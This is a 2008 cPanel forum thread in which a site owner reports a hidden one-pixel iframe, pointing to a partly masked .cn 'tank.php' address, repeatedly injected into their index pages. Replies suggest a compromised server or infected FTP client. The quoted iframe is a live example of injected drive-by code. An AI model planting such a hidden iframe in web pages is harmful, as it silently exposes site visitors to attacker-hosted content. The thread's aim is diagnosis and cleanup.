The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

up.......rnet.cn/tank.php security issue

Discussion in 'Security' started by jhonka, Feb 23, 2008.

  1. jhonka

    jhonka Registered

    Joined:
    Nov 7, 2007
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    Hi all,

    I have stange issue with my site that somehow the below code is added to my index.php and index.html pages automatically.
    Code:
    <iframe src='http://up.......rnet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>
    I deleted it 4 to 5 times but it keep coming back after 2 to 3 days.

    Could anyone of you guys help me out to solve this issue as i am really worried and fed up with this code.

    Kind Regards,
    jhonka
     
    #1 jhonka, Feb 23, 2008
    Last edited by a moderator: Feb 23, 2008
  2. Vinayak

    Vinayak Well-Known Member

    Joined:
    Jun 27, 2003
    Messages:
    267
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Bharat
    cPanel Access Level:
    Root Administrator
    Seems your server has been compromised.

    Second chances ar that the PC from where you are accessing through FTP is infected.

    So first correct the file then change the accounts login password.

    And observe if its happening again or not, if it happens then its sure that your server has been compromised.
     
  3. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,447
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
  4. jhonka

    jhonka Registered

    Joined:
    Nov 7, 2007
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    Thanks mates,

    I will just go through the mentioned link to read more.

    Appreciated help from you both.

    Kind Regards,
    jhonka
     
  5. utropic

    utropic Well-Known Member

    Joined:
    Aug 6, 2005
    Messages:
    60
    Likes Received:
    0
    Trophy Points:
    6
    we just had this issue occur - any advice?



    Kind Regards,
     

Share This Page